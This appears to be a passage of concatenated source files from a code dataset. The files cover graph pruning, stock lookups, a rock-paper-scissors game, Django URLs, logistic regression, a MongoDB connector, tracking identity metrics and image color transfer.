python3\nimport itertools\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\n\nALGORITHMS = {\"1\", \"2\"}\n# 1: sorted by flow to node\n# 2: incremental shaving by flow to node\n\n\ndef _get_flow_graph(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: square matrix representing flow graph\n :rtype: scipy.sparse.lil_matrix\n \"\"\"\n # calculate full squared matrix\n flow_matrix = graph * graph\n\n # covert to LIL so zeroing the diagonal is more efficient\n flow_graph = flow_matrix.tolil()\n\n # zero the diagonal, since nodes should not have flow with themselves\n for i in range(graph.shape[0]):\n flow_graph[i, i] = 0\n\n return flow_graph\n\n\ndef get_density_sorted_cluster(nodes, edges, algo):\n \"\"\"\n Get the information necessary to prune a graph (or subgraph).\n :param nodes: list of all node IDs (ints) in cluster.\n :type nodes: collections.Sequence[int]\n :param edges: list (iterator will work) of all edges, in the form\n (nodeID_1, nodeID_2, weight). Edges with a node ID that is\n not in `nodes` will be ignored.\n :type edges: collections.Iterable[(int, int, float)]\n :param algo: shaving algo to use (from ALGORITHMS)\n :type algo: str\n :return: list of node IDs sorted from least dense to most dense\n :rtype: tuple[int]\n \"\"\"\n n = len(nodes)\n\n # get a reverse dict for old IDs (elements of `nodes`) to new IDs (indices\n # of `nodes`). ID conversion is required so the graph can be\n # represented in a matrix.\n new_ids = {old_id: i for i, old_id in enumerate(nodes)}\n\n rows = list()\n cols = list()\n data = list()\n for id1, id2, weight in edges:\n try:\n new_id1 = new_ids[id1]\n new_id2 = new_ids[id2]\n except KeyError:\n continue # edge is not within subgraph; ignore it\n\n # TODO: if edges already contains both directions, bidirectional edges\n # TODO: do not need to be added here for each edge\n\n rows.append(new_id1)\n cols.append(new_id2)\n data.append(weight)\n\n rows.append(new_id2)\n cols.append(new_id1)\n data.append(weight)\n\n graph = csr_matrix((data, (rows, cols)), shape=(n, n), dtype=np.float16)\n\n # sort the new IDs by density, and convert back to old IDs\n return tuple(nodes[i] for i in _ALGORITHM_FUNCTIONS[algo](graph))\n\n\ndef _get_density_sorted_graph_1(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: A list of indices of the matrix that represents `graph` (each\n index represents a point) sorted from lowest density to highest\n density using node flow.\n \"\"\"\n n = graph.shape[0]\n\n flow_graph = _get_flow_graph(graph)\n\n # calculate sum of flow of all edges for each point (by summing the rows of\n # the flow matrix)\n node_densities = np.array(flow_graph.sum(axis=1).flat)\n\n sort_indices = node_densities.argsort()\n\n sorted_nodes = [None] * n\n for point_id, sort_index in enumerate(sort_indices):\n sorted_nodes[sort_index] = point_id\n\n return sorted_nodes\n\n\ndef _get_density_sorted_graph_2(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: A list of indices of the matrix that represents `graph` (each\n index represents a point) sorted from lowest density to highest\n density by incrementally shaving by node flow.\n \"\"\"\n flow_graph = _get_flow_graph(graph)\n\n # calculate sum of flow of all edges for each point (by summing the rows of\n # the flow matrix)\n node_densities = dict(enumerate(flow_graph.sum(axis=1).flat))\n\n sorted_nodes = list()\n while node_densities:\n least_dense_node = min(node_densities, key=node_densities.get)\n\n sorted_nodes.append(least_dense_node)\n\n del node_densities[least_dense_node]\n\n # all nodes connected to the least dense node\n connected_nodes = graph[least_dense_node].nonzero()[1]\n\n for node_1, node_2 in itertools.combinations(connected_nodes, 2):\n flow = graph[node_1, node_2]\n\n if node_1 in node_densities:\n node_densities[node_1] -= flow\n if node_2 in node_densities:\n node_densities[node_2] -= flow\n\n assert not node_densities\n\n return sorted_nodes\n\n\n_ALGORITHM_FUNCTIONS = {\n \"1\": _get_density_sorted_graph_1,\n \"2\": _get_density_sorted_graph_2\n}\n","sub_path":"python/graphHDS/prune_cluster.py","file_name":"prune_cluster.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"312847766","text":"from yahoo_finance import Share\nfrom pprint import pprint\n\ndef current_price_stock(name):\n stock = Share('{}'.format(name))\n return stock.get_price()\n\ndef current_time_stock(name):\n stock = Share('{}'.format(name))\n return stock.get_trade_datetime()\n\ndef price_change(name, beginning, ending):\n stock = Share('{}'.format(name))\n history_list = stock.get_historical(beginning, ending)\n length_of_days = len(history_list)\n first_day_data = history_list[length_of_days - 1]\n last_day_data = history_list[0]\n first_day_price = first_day_data.get('Adj_Close')\n last_day_price = last_day_data.get('Adj_Close')\n fprice = float(first_day_price)\n lprice = float(last_day_price)\n return fprice - lprice\n\n","sub_path":"Skeleton/stock_info.py","file_name":"stock_info.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243685552","text":"\nimport random\n\nrps = {\n\"rock\" : [\"paper\", \"scissors\", \"rock\"],\n\"paper\" : [\"scissors\", \"rock\", \"paper\"],\n\"scissors\" : [\"rock\", \"paper\", \"scissors\"]\n}\n\n# wins\n# rps[player[0]]\n\n# all keys\noptions = list(rps.keys())\n\ngame_in_session = \"yes\"\n\nprint(\"\\nWelcome to Rock, Paper, Scissors!\")\n\nwhile game_in_session == \"yes\":\n player = input(\"\\nMake your selection; Rock, Paper, or Scissors: \").lower()\n\n computer = random.choice(list(rps.keys()))\n print(f\"The computer has chosen: {computer}.\\n\")\n if computer == rps[player][0]:\n print(\"You lose.\")\n elif computer == rps[player][1]:\n print(\"You win.\")\n elif computer == rps[player][2]:\n print(\"You tied.\")\n else:\n print(\"Error\")\n\n game_in_session = input(\"\\nDo you want to play another game? \").lower()\nelse:\n print(\"\\nThank you for playing.\")\n\n\n'''\ngame_in_session = \"yes\"\n\nprint(\"\\nWelcome to Rock, Paper, Scissors!\")\n\nwhile game_in_session == \"yes\":\n\n player = input(\"\\nMake your selection: Rock, Paper, or Scissors: \")\n\n computer = random.choice(rps)\n\n print(f\"The computer has chosen: {computer}\")\n\n if player is rps[0] and computer is rps[2]:\n print(\"You have lost.\")\n\n elif((player == \"Rock\" and computer == \"Scissors\") or (player == \"Paper\" and computer == \"Rock\") or (player == \"Scissors\" and computer == \"Paper\")):\n print(\"You have won.\")\n\n elif player == computer:\n print(\"You have tied.\")\n\n game_in_session = input(\"Do you want to play another game? \")\nelse:\n print(\"Thank you for playing.\")\n'''\n","sub_path":"Assignments/duncan/python/lab07_rps_game.py","file_name":"lab07_rps_game.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"201569893","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Turing'\n\nimport Tkinter as tk\n\nif __name__ == '__main__':\n msg = tk.Message(text=\"Oh by the way, which one's Pink?\")\n msg.config(bg=\"pink\", font=(\"times\", 16, \"italic\"))\n msg.pack(fill=tk.X, expand=tk.YES)\n tk.mainloop()\n","sub_path":"python/PP4E/Gui/Tour/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562384708","text":"from django.conf.urls.defaults import *\n\n# admin enabled\nfrom django.contrib import admin\nadmin.autodiscover()\n\nnamespace = \"specialrequestchit\"\n\nurlpatterns = patterns('specialrequestchit.views',\n\n url(r'^$', 'specReq', name = \"specReq\"),\n (r'^/$', 'specReq'),\n (r'specReqSubmit$', 'specReqSubmit'),\n (r'specReqView$', 'specReqView'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # enabled the admin\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"fleet/src/cms/specialrequestchit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597143786","text":"import z3\n\n# This file contains global symbols for Intel pseudocode.\n# Basically, these are implementations of built-in functions that Intel doesn't\n# feel the need to specify apparently.\n\ndef POPCNT(bits, **kwargs):\n # This is a variable-width version of the classic 0x5555/0x3333/0x0f0f/0xffff\n # etc algorithm, to sum N bits in O(log2 N) steps\n shift = 1\n while shift < bits.size():\n mask = sum(1 << x for x in range(bits.size()) if not x & shift)\n bits = (bits & mask) + ((bits >> shift) & mask)\n shift *= 2\n return bits & ((1 << shift) - 1)\n\n# Should maybe handle this better...\ndef ZeroExtend(v, **kwargs):\n return v\n","sub_path":"intr_builtins.py","file_name":"intr_builtins.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362044929","text":"# written by Jingfeng Xia, jxia@wpi.edu\n\nimport LR\nimport numpy as np\nimport math\n\ndef train(X, Y, alpha=0.01, n_epoch=100):\n # number of features\n p = X.shape[1]\n # number of classes \n c = int(max(Y))\n\n # randomly initialize W and b\n W = np.asmatrix(np.random.rand(c,p))\n b= np.asmatrix(np.random.rand(c,1))\n\n for _ in range(n_epoch):\n # go through each training instance\n for x,y in zip(X,Y):\n y = int(y)-1\n x = x.T # convert to column vector\n # Forward pass: compute the logits, softmax and cross_entropy \n (z,a,l) = LR.forward(x,y,W,b)\n # Back Propagation: compute local gradients of cross_entropy, softmax and logits\n (dL_da,da_dz,dz_dW,dz_db) = LR.backward(x,y,a)\n # compute the global gradients using chain rule\n dL_dz = LR.compute_dL_dz(dL_da,da_dz)\n dL_dW = LR.compute_dL_dW(dL_dz,dz_dW)\n dL_db = LR.compute_dL_db(dL_dz,dz_db)\n # update the paramters using gradient descent\n W = LR.update_W(W, dL_dW, alpha)\n b = LR.update_b(b, dL_db, alpha)\n return W, b\n\ndef predict(Xtest, W, b):\n n = Xtest.shape[0]\n c = W.shape[0]\n Y = np.zeros(n) # initialize as all zeros\n P = np.asmatrix(np.zeros((n,c)))\n\n for i, x in enumerate(Xtest):\n x = x.T # convert to column vector\n# print(type(x))\n z = np.asmatrix(np.zeros(b.shape))\n z = np.dot(W,x) + b\n a = np.mat(np.zeros(z.shape))\n for j in range(0,z.shape[0]):\n a[j] = np.exp(z[j])\n a /= np.sum(a)\n Y[i] = np.argmax(a)+1\n P[i] = a.T\n\n return Y, P\n\ndef accuracy(test_y_or_train_y,Y):\n true = 0\n rows = Y.shape[0]\n for i in range(0,rows):\n if Y[i] == test_y_or_train_y[i]:\n true+=1\n else:\n pass\n accuracy = true/rows\n return accuracy","sub_path":"server/ML/Model/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"336560542","text":"#!/usr/bin/env python\n# coding:utf-8\nimport pymongo\nfrom pymongo import ASCENDING, DESCENDING\n\n# MongoDB コネクタ\nclass Connector:\n def __init__(self, dbName):\n # DB認証情報\n user = 'sObjectDataAdmin'\n pwd = 'Password01'\n self.client = pymongo.MongoClient('mongodb://mongo:27017/')\n # DB接続\n self.db = self.client[dbName]\n self.db.authenticate(user, pwd)\n assert self.client is not None\n\n #self.db.collection_names()\n #print(str(self.db.name), flush=True)\n\n def __del__(self):\n print(\"__del__\", flush=True)\n #self.client.close()\n\n # コレクションの確認, インデックス追加\n def checkCollection(self, collectionName, indexColumn):\n self.collection = self.db[collectionName]\n assert self.collection is not None\n ## インデックス追加\n self.collection.create_index([(indexColumn, ASCENDING)])\n print(\"Check Collection: \" + collectionName, flush=True)\n print(str(self.collection.name) + ' recodes : ' + str(self.collection.find().count()), flush=True)\n\n # コレクション削除\n def dropCollection(self, collectionName):\n self.collection = self.db[collectionName]\n assert self.collection is not None\n print(\"Drop Collection: \" + collectionName, flush=True)\n self.collection.drop()\n\n # バルクデータ登録\n def insertBulkdata(self, collectionName, data):\n if len(data) == 0:\n print(\"Noinsart Collection: \" + collectionName, flush=True)\n return \n self.collection = self.db[collectionName]\n assert self.collection is not None\n print(\"Insart Collection: \" + collectionName, flush=True)\n print(str(len(data)), flush=True)\n ## データ追加\n self.collection.insert_many(data)\n #assert self.collection.count_documents({}) == len(data)\n\n print(str(self.collection.name) + ' recodes : ' + str(self.collection.find().count()), flush=True)\n return len(data)\n\n ### 検索表示\n # 全データ表示\n def getAlldata(self, collectionName):\n self.collection = self.db[collectionName]\n assert self.collection is not None\n print(\"Get Collection: \" + collectionName, flush=True)\n datas = [data for data in self.collection.find({}, {'_id': False})]\n return datas\n\n # 1条件検索\n def searchSingleFilter(self, collectionName, Columns, value):\n self.collection = self.db[collectionName]\n assert self.collection is not None\n print(\"Search Collection: \" + Columns + \"= \" + value, flush=True)\n datas = [data for data in self.collection.find({Columns: value}, {'_id': False})]\n return datas\n\n # 期間指定検索\n def searchDatePeriodFilter(self, collectionName, dateColumn, startDate, endDate):\n self.collection = self.db[collectionName]\n assert self.collection is not None\n print(\"Search Collection: \" + startDate + \" - \" + endDate, flush=True)\n dateFilter= {dateColumn :{\"$gte\": str(startDate), \"$lte\": str(endDate)}}\n datas = [data for data in self.collection.find(dateFilter, {'_id': False}, sort = [(dateColumn, ASCENDING)])]\n return datas\n\n #### 複合検索-カラム作成 ############ \n def makeColumnsProject(self, mainColumns, subColumns, subCollectionName):\n columns = {}\n # メインコレクションカラム\n for column in mainColumns:\n #print(str(column), flush=True)\n columns[column] = \"$\" + column\n # サブコレクションカラム\n for column in subColumns:\n #print(str(column), flush=True)\n columns[column] = \"$\" + subCollectionName + \".\" + column\n # オブジェクトId無効\n columns[\"_id\"] = False\n project={\"$project\": columns}\n return project\n\n #### 複合���索-結合ルール作成 ############ \n def makeJoinLookup(self, mainCollection, subCollection):\n lookup={\"$lookup\":\n {\n \"from\":subCollection[\"collection\"],\n \"localField\": mainCollection[\"joinField\"],\n \"foreignField\":subCollection[\"joinField\"],\n \"as\":subCollection[\"collection\"]\n }}\n return lookup\n\n #### 複合検索 \n def joinsearchData(self, mainCollection, subCollection):\n self.collection = self.db[mainCollection[\"collection\"]]\n assert self.collection is not None\n ## 結合ルール\n lookup = self.makeJoinLookup(mainCollection, subCollection)\n ## subコレクションデータの配列解除\n unwind={\"$unwind\": \"$\"+subCollection[\"collection\"]}\n ## 必要なカラムの取り出し\n project=self.makeColumnsProject(mainCollection[\"columns\"], subCollection[\"columns\"], subCollection[\"collection\"])\n\n print(\"lookup Info: \" + str(lookup), flush=True)\n print(\"project Info: \" + str(project), flush=True)\n datas = [data for data in self.collection.aggregate([lookup, unwind, project])]\n return datas\n\n #### 複合検索-期間指定\n def joinsearchDataPeriod(self, mainCollection, subCollection,datePeriod):\n self.collection = self.db[mainCollection[\"collection\"]]\n assert self.collection is not None\n ## 結合ルール\n lookup = self.makeJoinLookup(mainCollection, subCollection)\n ## subコレクションデータの配列解除\n unwind={\"$unwind\": \"$\"+subCollection[\"collection\"]}\n ## 必要なカラムの取り出し\n project=self.makeColumnsProject(mainCollection[\"columns\"], subCollection[\"columns\"], subCollection[\"collection\"])\n\n print(\"lookup Info: \" + str(lookup), flush=True)\n print(\"project Info: \" + str(project), flush=True)\n\n #dateFilter= {dateColumn :{\"$gte\": str(startDate), \"$lte\": str(EndDate)}}\n dateFilter= {\"$match\": {datePeriod[\"dateColumn\"] :{\"$gte\": datePeriod[\"startDate\"], \"$lte\": datePeriod[\"endDate\"]}}}\n print(\"dateFilter Info: \" + str(dateFilter), flush=True)\n\n datas = [data for data in self.collection.aggregate([lookup, dateFilter, unwind, project])]\n print(\"dateFilter Info: \" + str([lookup, dateFilter, unwind, project]), flush=True)\n return datas\n\n def pipelineQuery(self, CollectionName, pipeline):\n self.collection = self.db[CollectionName]\n assert self.collection is not None\n datas = [data for data in self.collection.aggregate(pipeline)]\n return datas","sub_path":"sfaDataeRplica/accessormongo/code/MongoConnector.py","file_name":"MongoConnector.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"80326778","text":"import numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom ._base_metric import _BaseMetric\nfrom .. import _timing\nfrom .. import utils\n\n\nclass Identity(_BaseMetric):\n \"\"\"Class which implements the ID metrics\"\"\"\n\n @staticmethod\n def get_default_config():\n \"\"\"Default class config values\"\"\"\n default_config = {\n 'THRESHOLD': 0.5, # Similarity score threshold required for a IDTP match. Default 0.5.\n 'PRINT_CONFIG': True, # Whether to print the config information on init. Default: False.\n 'TRACK_IOU_THRESH': 0.2, # intersection of gt and pred tracks should be larger then this thresh. thresh is relative to pred track length\n }\n return default_config\n\n def __init__(self, config=None):\n super().__init__()\n self.integer_fields = ['IDTP', 'IDFN', 'IDFP']\n self.float_fields = ['IDF1', 'IDR', 'IDP']\n self.fields = self.float_fields + self.integer_fields\n self.summary_fields = self.fields\n\n # Configuration options:\n self.config = utils.init_config(config, self.get_default_config(), self.get_name())\n self.threshold = float(self.config['THRESHOLD'])\n self.track_iou_threshold = float(self.config['TRACK_IOU_THRESH'])\n\n @_timing.time\n def eval_sequence(self, data):\n \"\"\"Calculates ID metrics for one sequence\"\"\"\n # Initialise results\n res = {}\n for field in self.fields:\n res[field] = 0\n\n # Return result quickly if tracker or gt sequence is empty\n if data['num_tracker_dets'] == 0:\n res['IDFN'] = data['num_gt_dets']\n return self._compute_final_fields(res)\n if data['num_gt_dets'] == 0:\n res['IDFP'] = data['num_tracker_dets']\n return self._compute_final_fields(res)\n\n # Variables counting global association\n potential_matches_count = np.zeros((data['num_gt_ids'], data['num_tracker_ids']))\n gt_id_count = np.zeros(data['num_gt_ids'])\n tracker_id_count = np.zeros(data['num_tracker_ids'])\n\n # First loop through each timestep and accumulate global track information.\n for t, (gt_ids_t, tracker_ids_t) in enumerate(zip(data['gt_ids'], data['tracker_ids'])):\n # Count the potential matches between ids in each timestep\n matches_mask = np.greater_equal(data['similarity_scores'][t], self.threshold)\n match_idx_gt, match_idx_tracker = np.nonzero(matches_mask)\n potential_matches_count[gt_ids_t[match_idx_gt.tolist()].tolist(), tracker_ids_t[match_idx_tracker.tolist()].tolist()] += 1\n\n # Calculate the total number of dets for each gt_id and tracker_id.\n gt_id_count[gt_ids_t.tolist()] += 1\n tracker_id_count[tracker_ids_t.tolist()] += 1\n\n # Calculate optimal assignment cost matrix for ID metrics\n num_gt_ids = data['num_gt_ids']\n num_tracker_ids = data['num_tracker_ids']\n fp_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fn_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fp_mat[num_gt_ids:, :num_tracker_ids] = 1e10\n fn_mat[:num_gt_ids, num_tracker_ids:] = 1e10\n for gt_id in range(num_gt_ids):\n fn_mat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n fn_mat[gt_id, num_tracker_ids + gt_id] = gt_id_count[gt_id]\n for tracker_id in range(num_tracker_ids):\n fp_mat[:num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fp_mat[tracker_id + num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fn_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n fp_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n\n # Hungarian algorithm\n match_rows, match_cols = linear_sum_assignment(fn_mat + fp_mat)\n\n # Accumulate basic statistics\n res['IDFN'] = fn_mat[match_rows, match_cols].sum().astype(np.int)\n res['IDFP'] = fp_mat[match_rows, match_cols].sum().astype(np.int)\n res['IDTP'] = (gt_id_count.sum() - res['IDFN']).astype(np.int)\n\n # Calculate final ID scores\n res = self._compute_final_fields(res)\n return res\n\n def combine_classes_class_averaged(self, all_res, ignore_empty_classes=False):\n \"\"\"Combines metrics across all classes by averaging over the class values.\n If 'ignore_empty_classes' is True, then it only sums over classes with at least one gt or predicted detection.\n \"\"\"\n res = {}\n for field in self.integer_fields:\n if ignore_empty_classes:\n res[field] = self._combine_sum({k: v for k, v in all_res.items()\n if v['IDTP'] + v['IDFN'] + v['IDFP'] > 0 + np.finfo('float').eps},\n field)\n else:\n res[field] = self._combine_sum({k: v for k, v in all_res.items()}, field)\n for field in self.float_fields:\n if ignore_empty_classes:\n res[field] = np.mean([v[field] for v in all_res.values()\n if v['IDTP'] + v['IDFN'] + v['IDFP'] > 0 + np.finfo('float').eps], axis=0)\n else:\n res[field] = np.mean([v[field] for v in all_res.values()], axis=0)\n return res\n\n def combine_classes_det_averaged(self, all_res):\n \"\"\"Combines metrics across all classes by averaging over the detection values\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n res = self._compute_final_fields(res)\n return res\n\n def combine_sequences(self, all_res):\n \"\"\"Combines metrics across all sequences\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n res = self._compute_final_fields(res)\n return res\n\n @staticmethod\n def _compute_final_fields(res):\n \"\"\"Calculate sub-metric ('field') values which only depend on other sub-metric values.\n This function is used both for both per-sequence calculation, and in combining values across sequences.\n \"\"\"\n if res['IDFN'] != 0:\n res['IDR'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + res['IDFN'])\n else:\n res['IDR'] = 1\n if res['IDFP'] != 0:\n res['IDP'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + res['IDFP'])\n else:\n res['IDP'] = 1\n if res['IDFN'] != 0 or res['IDFP'] != 0:\n res['IDF1'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + 0.5 * res['IDFP'] + 0.5 * res['IDFN'])\n else:\n res['IDF1'] = 1\n return res\n\n\nclass TrackIdentity(Identity):\n @_timing.time\n def eval_sequence(self, data):\n \"\"\"Calculates ID metrics for one sequence\"\"\"\n # Initialise results\n res = {}\n for field in self.fields:\n res[field] = 0\n\n # Return result quickly if tracker or gt sequence is empty\n if data['num_tracker_dets'] == 0:\n res['IDFN'] = data['num_gt_ids']\n return res\n if data['num_gt_dets'] == 0:\n res['IDFP'] = data['num_tracker_ids']\n return res\n\n # Variables counting global association\n potential_matches_count = np.zeros((data['num_gt_ids'], data['num_tracker_ids']))\n gt_id_count = np.zeros(data['num_gt_ids'])\n tracker_id_count = np.zeros(data['num_tracker_ids'])\n\n # First loop through each timestep and accumulate global track information.\n for t, (gt_ids_t, tracker_ids_t) in enumerate(zip(data['gt_ids'], data['tracker_ids'])):\n # Count the potential matches between ids in each timestep\n matches_mask = np.greater_equal(data['similarity_scores'][t], self.threshold)\n match_idx_gt, match_idx_tracker = np.nonzero(matches_mask)\n potential_matches_count[gt_ids_t[match_idx_gt.tolist()].tolist(), tracker_ids_t[match_idx_tracker.tolist()].tolist()] += 1\n\n # Calculate the total number of dets for each gt_id and tracker_id.\n gt_id_count[gt_ids_t.tolist()] += 1\n tracker_id_count[tracker_ids_t.tolist()] += 1\n\n # Calculate optimal assignment cost matrix for ID metrics\n num_gt_ids = data['num_gt_ids']\n num_tracker_ids = data['num_tracker_ids']\n fp_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fn_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fp_mat[num_gt_ids:, :num_tracker_ids] = 1\n fn_mat[:num_gt_ids, num_tracker_ids:] = 1\n for gt_id in range(num_gt_ids):\n fn_mat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n fn_mat[gt_id, num_tracker_ids + gt_id] = 1.0 - 1e-6\n for tracker_id in range(num_tracker_ids):\n fp_mat[:num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fp_mat[tracker_id + num_gt_ids, tracker_id] = 1.0 - 1e-6\n fn_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n fp_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n cost_matrix = fn_mat + fp_mat\n cost_matrix[:num_gt_ids, :num_tracker_ids] /= (cost_matrix[:num_gt_ids, :num_tracker_ids] + potential_matches_count)\n cost_matrix[num_gt_ids:, num_tracker_ids:] = 1\n\n # Hungarian algorithm for IDF1\n match_rows, match_cols = linear_sum_assignment(cost_matrix)\n match_mask = np.logical_and(match_rows < num_gt_ids, match_cols < num_tracker_ids)\n # pred tracks with relative iou to predicted track length lower then thresh are sent to FN\n re_assigned = np.sum(np.less_equal(potential_matches_count[match_rows[match_mask],\n match_cols[match_mask]] /\n tracker_id_count[match_cols[match_mask]],\n self.track_iou_threshold)) # relative to predicted track length intersection\n # Hungarian algorithm for track_IDF1\n res['IDFN'] = np.sum(np.logical_and(match_rows < num_gt_ids, match_cols >= num_tracker_ids)).astype(np.int) + re_assigned\n res['IDFP'] = np.sum(np.logical_and(match_rows >= num_gt_ids, match_cols < num_tracker_ids)).astype(np.int) + re_assigned # sent to sink pred tracks counts as FP\n res['IDTP'] = (num_gt_ids - res['IDFN']).astype(np.int)\n\n # Calculate final ID scores\n res = self._compute_final_fields(res)\n return res\n\n def combine_sequences(self, all_res, average: str = \"macro\"):\n \"\"\"Combines metrics across all sequences\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n\n if average == \"micro\":\n res = self._compute_final_fields(res)\n elif average == \"macro\":\n for field in self.float_fields:\n res[field] = np.mean([all_res[k][field] for k in all_res.keys()]).astype(float)\n else:\n raise ValueError(f\"Unexpected average value: {average}\")\n return res\n","sub_path":"trackeval/metrics/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465990970","text":"\"\"\"\nbrief: change color through normalization (changing mean, std)\nauthor: lzhbrian (https://lzhbrian.me)\ndate: 2019.4.24\nusage:\n\n import cv2\n import numpy as np\n import matplotlib.pyplot as plt\n from PIL import Image\n\n from get_mask import get_mask\n from color_changer import color_transfer_wrapper\n\n img_path = './data/img.png'\n img_mask_path = './data/img.json'\n target_color_img_path = './data/color.jpg'\n target_color_img_mask_path = './data/color.json'\n\n img = np.array(Image.open(img_path).convert('RGB'))\n img_mask = get_mask(img_path, img_mask_path)\n target_color_img = np.array(Image.open(target_color_img_path).convert('RGB'))\n target_color_img_mask = get_mask(target_color_img_path, target_color_img_mask_path)\n\n img_transformed = color_transfer_wrapper(img, target_color_img,\n cv2.COLOR_RGB2LAB, cv2.COLOR_LAB2RGB,\n image_mask=img_mask,\n target_color_image_mask=target_color_img_mask,\n calc_channel=[True, True, True])\n\n img_transformed_pil = Image.fromarray(img_transformed)\n img_transformed_pil.save('output.png')\n\n plt.figure(figsize=(20, 8))\n plt.subplot(151); plt.imshow(img); plt.title('image'); plt.axis('off')\n plt.subplot(152); plt.imshow(img_mask); plt.title('mask'); plt.axis('off')\n plt.subplot(153); plt.imshow(target_color_img); plt.title('target color'); plt.axis('off')\n plt.subplot(154); plt.imshow(target_color_img_mask); plt.title('target color mask'); plt.axis('off')\n plt.subplot(155); plt.imshow(img_transformed); plt.title('transformed'); plt.axis('off')\n plt.tight_layout()\n plt.savefig('output_concat.png')\n\"\"\"\n\nimport os\nimport sys\nimport json\nfrom glob import glob\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\nfrom PIL import Image\nimport cv2\nimport numpy as np\n\ndef color_transfer(image, image_mask,\n target_mean, target_std,\n calc_channel=[True, True, True],\n DEBUG=False):\n \"\"\"\n transfer target color to image\n :param image: image image, a numpy array, HxWx3, may be RGB or LAB or HSV or ...\n :param image_mask: mask, a numpy array, HxW, 0 or 255, uint8\n :param target_mean: mean of each channel [c1, c2, c3], list, type is consistent with image (e.g. RGB)\n :param target_std: std of each channel [c1, c2, c3], list, type is consistent with image (e.g. RGB)\n :param calc_channel: if False in certain dim, skip that channel\n :return image_transfered: color transfered image, a numpy array, type is consistent with image (e.g. RGB)\n \"\"\"\n\n # calculate image mean, std of each channel, given mask\n # https://www.reddit.com/r/learnpython/comments/9gyg6h/image_processing/\n # image_mask is a 0 or 255 HxW np.array uint8\n # mean, std is 3x1 np.array\n image_mean, image_std = cv2.meanStdDev(image, mask=image_mask)\n\n # skip certain channel\n image_mean = np.squeeze(image_mean) * calc_channel\n target_mean = np.squeeze(target_mean) * calc_channel\n\n image_std = np.squeeze(image_std)\n target_std = np.squeeze(target_std)\n for c in range(3):\n if calc_channel[c] == False:\n image_std[c] = 1\n target_std[c] = 1\n\n # check\n image_mean = np.squeeze(image_mean)[np.newaxis, np.newaxis, :]\n image_std = np.squeeze(image_std)[np.newaxis, np.newaxis, :]\n if DEBUG:\n print(image_mean, image_std)\n target_mean = np.squeeze(target_mean)[np.newaxis, np.newaxis, :]\n target_std = np.squeeze(target_std)[np.newaxis, np.newaxis, :]\n if DEBUG:\n print(target_mean, target_std)\n\n # if only a color, then std would be 0, the result will be disgusting\n # if np.sum(target_std) == 0:\n # target_std += 10\n\n target_std[target_std == 0] = 10\n image_std[image_std == 0] = 10\n\n\n image_transformed = (image - image_mean) / np.sqrt(image_std) * np.sqrt(target_std) + target_mean \n image_transformed = image_mask[:, :, np.newaxis] / 255 * image_transformed + \\\n (1 - image_mask[:, :, np.newaxis] / 255) * image\n\n image_transformed = np.clip(image_transformed, 0, 255)\n return image_transformed.astype(np.uint8)\n\n\ndef color_transfer_wrapper(image, target_color_image,\n protocol, protocol_reverse,\n image_mask=None,\n target_color_image_mask=None,\n calc_channel=[True, True, True]):\n \"\"\"\n wrapper for color_transfer function\n will calc target_color_image's mean, std and convert it to image given image_mask\n\n :param image: image image, a numpy array, HxWx3, may be RGB or LAB or HSV or ...\n :param image_mask: mask, a numpy array, HxW, 0 or 255, uint8\n if not given, change all 